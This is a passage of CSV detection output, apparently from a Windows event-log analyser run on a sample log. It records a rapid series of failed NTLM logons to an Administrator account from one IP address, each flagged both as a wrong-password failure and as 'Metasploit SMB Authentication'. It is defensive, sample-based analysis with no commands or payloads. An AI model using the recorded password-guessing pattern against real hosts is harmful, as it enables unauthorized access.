Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 